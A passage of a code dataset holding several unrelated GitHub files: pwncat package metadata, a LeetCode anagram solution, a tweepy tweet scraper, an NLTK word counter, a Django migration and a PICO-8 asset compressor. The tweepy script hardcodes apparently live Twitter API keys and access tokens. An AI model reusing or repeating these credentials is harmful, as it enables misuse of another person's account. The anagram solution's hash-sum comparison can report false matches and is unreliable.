Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: System Administrators\",\n # Project topics\n \"Topic :: Communications :: Chat\",\n \"Topic :: Communications :: File Sharing\",\n \"Topic :: Internet\",\n \"Topic :: Security\",\n \"Topic :: System :: Shells\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Utilities\",\n # License\n \"License :: 
OSI Approved :: MIT License\",\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n # How does it run\n \"Environment :: Console\",\n # Where does it rnu\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"cytopia/pwncat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1653,"dataset":"github-code","pt":"29"} +{"seq_id":"418521595","text":"class Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n # using sliding window and hash values\n \"\"\"\n ans = []\n s -> cbaebabacd\n p -> abc\n lP = 10\n lS = 3\n S = hash(a) + hash(b) + hash(c)\n P = hash(c) + hash(b) + hash(a) = hash(abc)\n base condition:\n S == P -> \n ans = [0]\n for loop:\n S = hash(b) + hash(a) + hash(e)\n S != P\n S = hash(a) + hash(e) + hash(b)\n S != P\n S = hash(e) + hash(b) + hash(a)\n S != P\n S = hash(b) + hash(a) + hash(b)\n S != P\n S = hash(a) + hash(b) + hash(a)\n S != P\n S = hash(a) + hash(b) + hash(c)\n S == P\n ans = [6]\n \"\"\"\n ans = []\n lP = len(p)\n lS = len(s)\n S,P = 0,0\n if (lS < lP):\n return []\n for i in range(lP):\n S += hash(s[i])\n P += hash(p[i])\n if S==P:\n ans.append(0)\n for i in range(lP, lS):\n S += hash(s[i]) - hash(s[i-lP])\n if (S == P):\n ans.append(i-lP + 1)\n return ans","repo_name":"amya-singhal/Leetcode","sub_path":"0438-find-all-anagrams-in-a-string/0438-find-all-anagrams-in-a-string.py","file_name":"0438-find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42886248398","text":"\r\n #-*- coding:utf-8 -*-\r\nimport tweepy\r\nimport csv\r\nimport locale\r\nlocale.setlocale(locale.LC_ALL, \"Turkish\")\r\nconsumer_key = \"vdRk3b1NYDyKktFscyxn5LlLy\"\r\nconsumer_secret = \"StQafrPKHedWOKz5j0Eb4EgL6gZ3o1tE6tw91dPxjI05cZYL2q\"\r\naccess_token = \"1072416826351599616-xPctnCFfAjS1zr2DplUGZEJef8X3eV\"\r\naccess_token_secret = \"SawkFaezzt0zRfH7MM8vEIo2jhplXIdiep5QMspeEkmLW\"\r\n\r\ntry:\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth,wait_on_rate_limit=True)\r\nexcept tweepy.TweepError:\r\n print ('Authentication Error')\r\n \r\ncsvFile = open('Nisan13.csv', 'a', encoding='utf-8')\r\ncsvWriter = csv.writer(csvFile)\r\n\r\nstartsince = '2021-04-13'\r\nendUntil = '2021-04-14'\r\n\r\ntweet_max_boyut = 280\r\n\r\ntotal_tweets=[]\r\n\r\nfor status in tweepy.Cursor(api.search,\r\n q=\"korona\", \r\n since =startsince, until=endUntil,languages='Turkish',\r\n tweet_mode='extended').items(99999):\r\n \r\n if len(status.full_text) > tweet_max_boyut:\r\n \r\n united_tweet = []\r\n cut = status.full_text[:tweet_max_boyut] \r\n status.full_text = status.full_text[tweet_max_boyut:]\r\n united_tweet.append(cut+status.full_text)\r\n \r\n for x in united_tweet:\r\n \r\n if x not in total_tweets:\r\n csvWriter.writerow([status.created_at ,status.retweet_count, x])\r\n total_tweets.append(x)\r\n \r\n else:\r\n \r\n print (\"Text:\", status.full_text)\r\n if status.full_text not in total_tweets:\r\n csvWriter.writerow([status.created_at ,status.retweet_count, status.full_text])\r\n 
total_tweets.append(status.full_text)\r\n","repo_name":"Emineckmkc/BitirmeProjesi","sub_path":"src/verisetihazirlama.py","file_name":"verisetihazirlama.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74538091598","text":"import sys\r\nimport string\r\nimport re\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nimport pandas\r\n\r\ntexts = \"\"\r\n\r\ndef main():\r\n\r\n    with open('01.txt', 'r') as f:\r\n        texts = \"\".join(line.rstrip('\\n') for line in f)\r\n    \r\n    texts = texts.lower()\r\n    # strip punctuation with a regex; str.replace would only match the pattern literally\r\n    texts = re.sub(r'[^\\w\\s]', '', texts)\r\n    stop = stopwords.words('english')\r\n    \r\n    words = texts.split()\r\n    # filter stopwords with a comprehension; removing from the list while iterating skips elements\r\n    words = [w for w in words if w not in stop]\r\n    \r\n    print(len(words))\r\n    \r\n    \r\n    print(check('social', words))\r\n\r\n    \r\n    freq = pandas.Series(words).value_counts()[:50]\r\n    print(freq)\r\n\r\n\r\n\r\ndef check(word, words):\r\n    \"\"\"Return the number of case-insensitive occurrences of word in words\"\"\"\r\n    COUNT = 0\r\n    for elem in words:\r\n        if elem.lower() == word:\r\n            COUNT = COUNT + 1\r\n    return COUNT\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n\r\n","repo_name":"EvPng/text-analysis","sub_path":"T.py","file_name":"T.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22581127551","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        (\"pinboard\", \"0001_initial\"),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name=\"bookmark\",\n            name=\"shared\",\n        ),\n        migrations.AlterField(\n            model_name=\"bookmark\",\n            name=\"raw\",\n            field=models.TextField(\n                help_text=b\"eg, the raw JSON from the API.\", blank=True\n            ),\n        ),\n    ]\n","repo_name":"philgyford/django-ditto","sub_path":"ditto/pinboard/migrations/0002_auto_20150626_1521.py","file_name":"0002_auto_20150626_1521.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"29"} +{"seq_id":"7243328756","text":"from shared import readAssets\nfrom shared import swapNibbles\nfrom classes import assetCompressed\n\nfrom compress.rle import *\nfrom compress.huffman import *\nfrom compress.hilbert import *\n\nimport math\n\ndef compressAsset(asset, args):\n\n\tglobal totalSize\n\tglobal totalSizeWithoutHilbert\n\tglobal totalSizeWithoutRLE\n\tglobal totalSizeWithoutHuffman\t\n\tglobal currentAssetIndex\n\tglobal amountOfAssets\t\n\tglobal commandStringData\t\n\tglobal usesHilbert\n\tglobal usesRLE\n\tglobal usesHuffman\n\t\n\tif asset.bitmap != None:\n\t\ttype = \"bitmap\"\n\t\tscanlineWidth = len(asset.bitmap[0])\n\t\tdataLinearRaw = \"\"\n\t\tfor line in asset.bitmap:\n\t\t\tdataLinearRaw += line\n\t\tdataLinearRaw = swapNibbles(dataLinearRaw)\n\telse:\n\t\ttype = \"generic\"\n\t\tscanlineWidth = len(asset.data)\n\t\tdataLinearRaw = asset.data\n\t\t\n\twinnerMethodID = 0\n\twinnerData = dataLinearRaw\n\twinnerSize = len(dataLinearRaw)\n\tbestWithoutRLE = winnerSize\n\tbestWithoutHuffman = winnerSize\n\tbestWithoutHilbert = winnerSize\n\t\n\tprint(\"Compressing asset \" + str(currentAssetIndex) + \" out of \" + str(amountOfAssets) + \" (name: \" + asset.name + \", type: \" + type + \", size: \" + str(len(dataLinearRaw))+\")\")\n\t\n\tverificationFailures = []\n\t\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t 
\n\t\tdataHilbertRaw = swapNibbles(hilbertMap(asset.bitmap))\n\t\t\n\t\trleFailed = False\n\t\t\n\t\tif args.no_rle == False:\n\t\t\tdataHilbertRLE = rleCompress(dataHilbertRaw)\n\t\t\tif rleDecompress(dataHilbertRLE) != dataHilbertRaw:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, RLE\")\n\t\t\t\trleFailed = True\n\t\t\telse:\n\t\t\t\tbestWithoutHuffman = min(len(dataHilbertRLE), bestWithoutHuffman)\n\t\t\t\tif len(dataHilbertRLE) < winnerSize:\n\t\t\t\t\twinnerSize = len(dataHilbertRLE)\n\t\t\t\t\twinnerMethodID = 6\n\t\t\t\t\twinnerData = dataHilbertRLE\n\t\t\t\t\t\n\t\tif args.no_huffman == False:\n\t\t\tdataHilbertHuffman = huffmanCompress(dataHilbertRaw)\n\t\t\tif huffmanDecompress(dataHilbertHuffman) != dataHilbertRaw:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, Huffman coding\")\n\t\t\telse:\n\t\t\t\tbestWithoutRLE = min(len(dataHilbertHuffman), bestWithoutRLE)\n\t\t\t\tif len(dataHilbertHuffman) < winnerSize:\n\t\t\t\t\twinnerSize = len(dataHilbertHuffman)\n\t\t\t\t\twinnerMethodID = 5\n\t\t\t\t\twinnerData = dataHilbertHuffman\n\t\t\t\t\t\n\t\tif args.no_rle == False and args.no_huffman == False and rleFailed == False:\n\t\t\tdataHilbertBoth = huffmanCompress(dataHilbertRLE)\n\t\t\tif huffmanDecompress(dataHilbertBoth) != dataHilbertRLE:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, RLE to Huffman coding\")\n\t\t\telif len(dataHilbertBoth) < winnerSize:\n\t\t\t\twinnerSize = len(dataHilbertBoth)\n\t\t\t\twinnerMethodID = 7\n\t\t\t\twinnerData = dataHilbertBoth\n\t\t\t\t\n\trleFailed = False\n\t\n\terrorMessageStart = \"\"\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t\terrorMessageStart = \"Linear mapping, \"\n\t\n\tif args.no_rle == False:\n\t\tdataLinearRLE = rleCompress(dataLinearRaw)\n\t\tif rleDecompress(dataLinearRLE) != dataLinearRaw:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"RLE\")\n\t\t\trleFailed = True\n\t\telse:\n\t\t\tbestWithoutHuffman = min(len(dataLinearRLE), bestWithoutHuffman)\n\t\t\tbestWithoutHilbert = min(len(dataLinearRLE), bestWithoutHilbert) \n\t\t\tif len(dataLinearRLE) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearRLE)\n\t\t\t\twinnerMethodID = 2\n\t\t\t\twinnerData = dataLinearRLE\n\t\t\t\t\t\n\tif args.no_huffman == False:\n\t\tdataLinearHuffman = huffmanCompress(dataLinearRaw)\n\t\tif huffmanDecompress(dataLinearHuffman) != dataLinearRaw:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"Huffman coding\")\n\t\telse:\n\t\t\tbestWithoutRLE = min(len(dataLinearHuffman), bestWithoutRLE)\n\t\t\tbestWithoutHilbert = min(len(dataLinearHuffman), bestWithoutHilbert)\n\t\t\tif len(dataLinearHuffman) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearHuffman)\n\t\t\t\twinnerMethodID = 1\n\t\t\t\twinnerData = dataLinearHuffman\n\t\t\t\t\t\n\tif args.no_rle == False and args.no_huffman == False and rleFailed == False:\n\t\tdataLinearBoth = huffmanCompress(dataLinearRLE)\n\t\tif huffmanDecompress(dataLinearBoth) != dataLinearRLE:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"RLE to Huffman coding\")\n\t\telse:\n\t\t\tbestWithoutHilbert = min(len(dataLinearBoth), bestWithoutHilbert)\n\t\t\tif len(dataLinearBoth) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearBoth)\n\t\t\t\twinnerMethodID = 3\n\t\t\t\twinnerData = dataLinearBoth \n\t\n\tif winnerMethodID % 4 == 0:\n\t\twinnerMethod = \"Raw\"\n\tif winnerMethodID % 4 == 1:\n\t\twinnerMethod = \"Huffman coding\"\n\t\tusesHuffman = True\n\tif winnerMethodID % 4 == 2:\n\t\twinnerMethod = \"RLE\"\n\t\tusesRLE = True\n\tif 
winnerMethodID % 4 == 3:\n\t\twinnerMethod = \"RLE to Huffman coding\"\n\t\tusesRLE = True\n\t\tusesHuffman = True\n\t\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t\tif winnerMethodID <= 4:\n\t\t\twinnerMethod = \"Linear mapping, \" + winnerMethod\n\t\telse:\n\t\t\twinnerMethod = \"Hilbert mapping, \" + winnerMethod\n\t\t\tusesHilbert = True\n\t\t\t\n\tprint(\"Compressed size: \" + str(winnerSize) + \" (\" + winnerMethod + \")\")\n\t\n\tif len(verificationFailures) > 0:\n\t\tprint(\"Verification failures detected:\")\n\t\tfor line in verificationFailures:\n\t\t\tprint(line)\n\t\t\t\n\tnewAssetCompressed = assetCompressed(asset.name, type, winnerData, scanlineWidth, winnerSize, totalSize, winnerMethodID)\n\t\n\ttotalSize += winnerSize\n\ttotalSizeWithoutHilbert += bestWithoutHilbert\n\ttotalSizeWithoutRLE += bestWithoutRLE\n\ttotalSizeWithoutHuffman += bestWithoutHuffman\n\t\n\tcurrentAssetIndex += 1\n\t\n\tprint(\"\")\n\t\n\tcommandStringData += str(winnerSize) + \"_\"\n\t\n\tif type == \"bitmap\":\n\t\tcommandStringData += str(scanlineWidth) + \"_\" + str(len(asset.bitmap) - 1)\n\telse:\n\t\tcommandStringData += str(scanlineWidth) + \"_0\"\n\t\t\n\tfor i in range(0, 3):\n\t\tcommandStringData += \"_\" + str(winnerMethodID >> i & 1)\n\t\t\n\tcommandStringData += \"|\"\n\n\treturn newAssetCompressed\n\t\ndef encodeOutputCartData(args):\n\n # encode compressed data into the .p8 format\n\n\tglobal compressedAssets\n\tglobal outputGfxArea\n\tglobal outputMapArea\n\tglobal outputGffArea\n\tglobal outputMusicArea\n\tglobal outputSfxArea\n\t\n\tglobal writeGfxArea\n\tglobal writeMapArea\n\tglobal writeGffArea\n\tglobal writeMusicArea\n\tglobal writeSfxArea\n\t\n\tglobal overflowData\n\t\n\tcartDataString = \"\"\n\t\n\tfor asset in compressedAssets:\n\t\tcartDataString += asset.data\n\t\t\n\t# encode __gfx__\n\t\n\tgfxDataString = cartDataString[:16384]\n\twhile len(gfxDataString) % 2 != 0:\n\t\tgfxDataString += \"0\"\n\t\t\n\toutputGfxArea.append(\"__gfx__\\n\")\n\t\n\toutputLine = \"\"\n\n\tfor i in range(0, len(gfxDataString), 2):\n\t\toutputByte = gfxDataString[i + 1] + gfxDataString[i]\n\t\toutputLine += outputByte\n\t\tif len(outputLine) == 128 or i == len(gfxDataString) - 2:\n\t\t\twhile len(outputLine) < 128:\n\t\t\t\toutputLine += \"0\"\n\t\t\toutputGfxArea.append(outputLine + \"\\n\")\n\t\t\toutputLine = \"\"\n\t\n\tif not args.gfx_only:\n\t\n\t\t# encode __map__\n\t\t\n\t\tif len(cartDataString) > 16384:\n\t\t\n\t\t\twriteMapArea = True\n\t\t\n\t\t\tmapDataString = cartDataString[16384 : 24576]\n\t\t\n\t\t\toutputMapArea.append(\"__map__\\n\")\n\n\t\t\tfor i in range(0, len(mapDataString), 256):\n\t\t\t\toutputLine = mapDataString[i : i + 256]\n\t\t\t\twhile len(outputLine) < 256:\n\t\t\t\t\toutputLine = outputLine + \"0\"\n\t\t\t\toutputMapArea.append(outputLine + \"\\n\")\n\t\t\t\n\t\t# encode __gff__\n\t\t\n\t\tif len(cartDataString) > 24576:\n\t\t\n\t\t\twriteGffArea = True\n\t\t\n\t\t\tgffDataString = cartDataString[24576 : 25088]\n\t\t\twhile len(gffDataString) < 512:\n\t\t\t\tgffDataString += \"0\"\n\t\t\n\t\t\toutputGffArea.append(\"__gff__\\n\")\n\t\t\n\t\t\tfor i in range(0, 512, 256):\n\t\t\t\toutputGffArea.append(gffDataString[i : i+256] + \"\\n\")\n\t\t\t\t\n\t\tif not args.spare_music:\n\t\t\n\t\t\t# encode __music__\n\t\t\n\t\t\tif len(cartDataString) > 25088:\n\t\t\t\n\t\t\t\twriteMusicArea = True\n\t\t\n\t\t\t\tmusicDataString = cartDataString[25088 : 25600]\n\n\t\t\t\toutputMusicArea.append(\"__music__\\n\")\n\t\n\t\t\t\tfor i in range(0, 
len(musicDataString), 8):\n\t\t\t\t\tinputPattern = musicDataString[i : i + 8]\n\t\t\t\t\twhile len(inputPattern) < 8:\n\t\t\t\t\t\tinputPattern = inputPattern + \"0\"\n\t\t\t\t\tflagNibble = 0\n\t\t\t\t\tflagBitValue = 1\n\t\t\t\t\tstrChannels = \"\"\n\t\t\t\t\tfor j in range(0, 8, 2):\n\t\t\t\t\t\tinputHex = inputPattern[j : j + 2]\n\t\t\t\t\t\tinputDec = int(inputHex, 16)\n\t\t\t\t\t\tif inputDec > 127: #checks if flag bit if set\n\t\t\t\t\t\t\tflagNibble += flagBitValue\n\t\t\t\t\t\tflagBitValue *= 2 \n\t\t\t\t\t\tchannelDec = inputDec & 127 #bitwise and, gets the channel bits\n\t\t\t\t\t\tchannelHex = format(channelDec, \"02x\")\n\t\t\t\t\t\tstrChannels = strChannels + channelHex\n\t\t\t\t\tflagNibbleInHex = format(int(flagNibble), \"02x\")\n\t\t\t\t\toutputMusicArea.append(flagNibbleInHex + \" \" + strChannels + \"\\n\")\n\t\t\t\n\t\t\t# encode __sfx__\n\t\t\n\t\t\tif len(cartDataString) > 25600:\n\t\t\t\n\t\t\t\twriteSfxArea = True\n\t\t\n\t\t\t\tsfxDataString = cartDataString[25600 : 34304]\n\t\t\t\toutputSfxArea.append(\"__sfx__\\n\")\n\t\t\n\t\t\t\tfor i in range(0, len(sfxDataString), 136):\n\t\t\t\t\tinputSound = sfxDataString[i : i + 136]\n\t\t\t\t\twhile len(inputSound) < 136:\n\t\t\t\t\t\tinputSound = inputSound + \"0\"\n\t\t\t\t\toutputNotes = \"\"\n\t\t\t\t\tfor j in range(0, 128, 4):\n\t\t\t\t\t\tnoteHex = inputSound[j + 2 : j + 4] + inputSound[j : j + 2]\n\t\t\t\t\t\tnoteDec = int(noteHex, 16)\n\t\t\t\t\t\tnoteBinary = format(noteDec, \"016b\")\n\t\t\t\t\t\tinstrumentFlag = int(noteBinary[0], 2)\n\t\t\t\t\t\teffectDec = int(noteBinary[1 : 4], 2)\n\t\t\t\t\t\tvolumeDec = int(noteBinary[4 : 7], 2)\n\t\t\t\t\t\twaveformDec = int(noteBinary[7 : 10], 2) + 8 * instrumentFlag\n\t\t\t\t\t\tpitchDec = int(noteBinary[10 : 16], 2)\n\t\t\t\t\t\tpitchHex = format(pitchDec, \"02x\")\n\t\t\t\t\t\twaveformHex = format(waveformDec, \"x\")\n\t\t\t\t\t\tvolumeHex = format(volumeDec, \"x\")\n\t\t\t\t\t\teffectHex = format(effectDec, \"x\")\n\t\t\t\t\t\toutputNotes = outputNotes + pitchHex + waveformHex + volumeHex + effectHex\n\t\t\t\t\toutputHeader = inputSound[128 : 136]\n\t\t\t\t\toutputSfxArea.append(outputHeader + outputNotes + \"\\n\")\n\t\t\t\t\t\n\tif len(cartDataString) > usableCartData:\n\t\toverflowData = cartDataString[usableCartData :]\n \ndef doPack(args):\n\n\tprint(\"Larkstongue v0.0.1-alpha\")\n \n # set global variables\n\t\n\tglobal totalSize\n\tglobal totalSizeWithoutHilbert\n\tglobal totalSizeWithoutRLE\n\tglobal totalSizeWithoutHuffman\n\t\n\ttotalSize = 0\n\ttotalSizeWithoutHilbert = 0\n\ttotalSizeWithoutRLE = 0\n\ttotalSizeWithoutHuffman = 0\n\t\n\tglobal writeGfxArea\n\tglobal writeMapArea\n\tglobal writeGffArea\n\tglobal writeMusicArea\n\tglobal writeSfxArea\n\t\n\twriteGfxArea = True\n\twriteMapArea = False\n\twriteGffArea = False\n\twriteMusicArea = False\n\twriteSfxArea = False\n\t\n\tglobal usableCartData\n\t\n\tif args.gfx_only:\n\t\tusableCartData = 16384\n\telif args.spare_music:\n\t\tusableCartData = 25088\n\telse:\n\t\tusableCartData = 34304\n\t\t\n\tglobal overflowData\n\toverflowData = \"\"\n\n\tglobal compressedAssets\n\tcompressedAssets = []\n\n\tglobal commandStringData\n\tcommandStringData = \"\"\n\n\tglobal outputGfxArea\n\tglobal outputMapArea\n\tglobal outputGffArea\n\tglobal outputMusicArea\n\tglobal outputSfxArea\n\t\n\toutputGfxArea = []\n\toutputMapArea = []\n\toutputGffArea = []\n\toutputMusicArea = []\n\toutputSfxArea = [] \n\t\t\n\tglobal usesHilbert\n\tglobal usesRLE\n\tglobal usesHuffman\n\t\n\tusesHilbert = False\n\tusesRLE = 
False\n\tusesHuffman = False\n\t\n\tassetList = readAssets(args.input, True)\n \n # check for duplicate names\n\t\n\tdupeList = []\n\tfor asset in assetList:\n\t\tif asset.name in dupeList:\n\t\t\tprint(\"Error! The name \\\"\" + asset.name + \"\\\" appears in \" + args.input + \" more than once\")\n\t\t\tquit()\n\t\tdupeList.append(asset.name)\n\t\n\tglobal amountOfAssets\n\tglobal currentAssetIndex\n\t\t\n\tamountOfAssets = len(assetList)\n\tcurrentAssetIndex = 1\n\t\n\ttotalRawSize = 0\n\tfor asset in assetList:\n\t\ttotalRawSize += asset.size\n \n # compress assets\n\n\tprint(\"Compressing \" + str(amountOfAssets) + \" assets, total size \" + str(totalRawSize) + \" nibbles\")\n\t\n\tprint(\"\")\n\t\n\tstartPopping = False\n\tpopToArea = None\n\t\n\tfor asset in assetList:\n\t\tcompressedAssets.append(compressAsset(asset, args))\n\t\n\tencodeOutputCartData(args)\n\t\n\t# generate loader\n\t\n\tcartDataSizeInBytes = math.ceil(min(totalSize, usableCartData) / 2)\n\t\n\tcommandStringDataStart = \"data, asset_list = mem_to_str(0, \" + str(cartDataSizeInBytes) + \")\"\n\tif len(overflowData) > 0:\n\t\tcommandStringDataStart += \"..\\\"\" + overflowData + \"\\\"\"\n\t\t\n\tcommandStringData = commandStringDataStart + \", parse_table(\\\"\" + commandStringData + \"\\\")\"\n\t\n\tcommandStringLoaderCall = \"\"\n\tfor asset in assetList:\n\t\tcommandStringLoaderCall += asset.name + \", \"\n\t\n\tcommandStringLoaderCall = commandStringLoaderCall[:-2] + \" = larkstongue_unpack(1)\"\n\t\n\tloaderFileName = args.output\n\tif \".\" in loaderFileName:\n\t\tloaderFileName = \".\".join(loaderFileName.split(\".\")[:-1])\n\tloaderFileName += \"_larkstongue.p8l\"\n\t\n\tfile = open(loaderFileName, \"w\")\n\n\tfile.write(\"function larkstongue_unpack(asset_index)\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tcls()\\n\")\n\tif args.progressbar:\n\t\tfile.write(\"\\trect(8, 60, 120, 68, 7)\\n\")\n\t\tfile.write(\"\\trectfill(10, 62, 11 + \" + str(108 / amountOfAssets) + \" * (asset_index - 1), 66, 7)\\n\")\n\tfile.write(\"\\tflip()\\n\")\n\tfile.write(\"\\tholdframe()\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tcurrent_asset = asset_list[asset_index]\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tif current_asset==nil then\\n\")\n\tfile.write(\"\\t\\treturn\\n\")\n\tfile.write(\"\\tend\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tasset_string, asset, data = sub(data,1,current_asset[1]), {}, sub(data,current_asset[1]+1)\\n\")\n\tfile.write(\"\\n\")\n\tif usesHuffman:\n\t\tfile.write(\"\\tif current_asset[4] == 1 then asset_string = huffman_decomp(asset_string) end\\n\")\n\tif usesRLE:\n\t\tfile.write(\"\\tif current_asset[5] == 1 then asset_string = rle_decomp(asset_string) end\\n\")\n\tfile.write(\"\\n\")\t\t\n\tfile.write(\"\\tfor i = 0, current_asset[3] do\\n\")\n\tfile.write(\"\\t\\tadd(asset, sub(asset_string, i * current_asset[2] + 1, (i + 1) * current_asset[2]))\\n\")\n\tfile.write(\"\\tend\\n\")\n\tif usesHilbert:\n\t\tfile.write(\"\\n\")\n\t\tfile.write(\"\\tif (current_asset[6] == 1) hilbert_unwrap()\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tif asset_index <= #asset_list then\\n\")\n\tfile.write(\"\\t\\treturn asset, larkstongue_unpack(asset_index + 1)\\n\")\n\tfile.write(\"\\tend\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"end\\n\")\n\tfile.write(\"\\n\")\n\n\tfile.write(commandStringData + \"\\n\" + commandStringLoaderCall + \"\\ndata, asset_list = nil, nil\\nmemset(0, 0, \" + str(usableCartData / 2) + \")\\ncls()\\npal()\")\n\tfile.close()\n \n # write includes and cart data to 
target cart\n\t\n\ttry:\n\t\tfile = open(args.output, \"r\")\n\t\tcartText = file.readlines()\n\t\tfile.close\n\texcept FileNotFoundError:\n\t\tprint(args.output + \" not found, generating new cart\")\n\t\tcartText = [\"pico-8 cartridge // http://www.pico-8.com\\n\",\n\t\t\t\t\t\"version 22\\n\",\n\t\t\t\t\t\"__lua__\\n\",\n\t\t\t\t\t\"\\n\",\n\t\t\t\t\t\"__gfx__\\n\"]\n\t\tfile = open(args.output, \"w\")\n\t\tfor line in cartText:\n\t\t\tfile.write(line)\n\t\tfile.close\n\t\n\tcartLine = 0\n\t\n\tdef changePopToArea(targetArea, writeToThisArea):\n\t\tif writeToThisArea:\n\t\t\tpopToArea = None\n\t\telse:\n\t\t\tpopToArea = targetArea\n\t\t\t\n\twhile cartLine < len(cartText):\n\t\n\t\tif cartText[cartLine].startswith(\"__label__\"):\n\t\t\tbreak\n\t\n\t\tif cartText[cartLine].startswith(\"__\"):\n\t\t\tstartPopping = True \n\t\t\tif cartText[cartLine].startswith(\"__gfx__\"):\n\t\t\t\tif writeGfxArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputGfxArea\n\t\t\telif cartText[cartLine].startswith(\"__map__\"):\n\t\t\t\tif writeMapArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputMapArea\n\t\t\telif cartText[cartLine].startswith(\"__gff__\"):\n\t\t\t\tif writeGffArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputGffArea\n\t\t\telif cartText[cartLine].startswith(\"__music__\"):\n\t\t\t\tif writeMusicArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputMusicArea\n\t\t\telif cartText[cartLine].startswith(\"__sfx__\"):\n\t\t\t\tif writeSfxArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputSfxArea\n\t\t\telse:\n\t\t\t\tstartPopping = False\n\t\t\t\n\t\tif startPopping:\n\t\t\tif popToArea == None:\n\t\t\t\tcartText.pop(cartLine)\n\t\t\telse:\n\t\t\t\tpopToArea.append(cartText.pop(cartLine))\n\t\telse:\n\t\t\tcartLine += 1\n\t\t\t\n\tdef writeArea(outputArea):\n\t\tfor i in range(len(outputArea) - 1, -1, -1):\n\t\t\t#print(outputArea[i])\n\t\t\tcartText.insert(cartLine, outputArea[i])\n\t\t\t\n\twriteArea(outputMusicArea)\n\twriteArea(outputSfxArea)\n\twriteArea(outputMapArea)\n\twriteArea(outputGffArea)\n\twriteArea(outputGfxArea)\n\t\n\tfilterLines=[\n\t\t\"hilbert_unwrap.p8l\",\n\t\t\"rle_decomp.p8l\",\n\t\t\"huffman_decomp.p8l\",\n\t\t\"hex_to_dec.p8l\",\n\t\t\"str_to_mem.p8l\",\n\t\t\"mem_to_str.p8l\",\n\t\t\"parse_table.p8l\",\n\t\t\"larkstongue.p8l\"]\n\t\n\tfor filterLine in filterLines:\n\t\tcartText = list(filter(lambda line: filterLine not in line, cartText))\n\t\n\tlineNumber = 3\n\twhile cartText[lineNumber].startswith(\"--\"):\n\t\tlineNumber += 1\n\t\t\n\tcartText.insert(lineNumber, \"#include \" + loaderFileName + \"\\n\")\n\tif usesHuffman:\n\t\tcartText.insert(lineNumber, \"#include include/huffman_decomp.p8l\\n\")\n\tif usesRLE:\n\t\tcartText.insert(lineNumber, \"#include include/rle_decomp.p8l\\n\")\n\tif usesHilbert:\n\t\tcartText.insert(lineNumber, \"#include include/hilbert_unwrap.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/parse_table.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/mem_to_str.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/str_to_mem.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/hex_to_dec.p8l\\n\")\n\t \n\tfile = open(args.output, \"w\")\n\tfor line in cartText:\n\t\tfile.write(line)\n\tfile.close()\n \n # output summary\n\t\n\tspaceSavings = 100 * (1 - totalSize / totalRawSize)\n\t\t\n\tprint(\"Total size of compressed data: \" + str(totalSize) + \" (\" + 
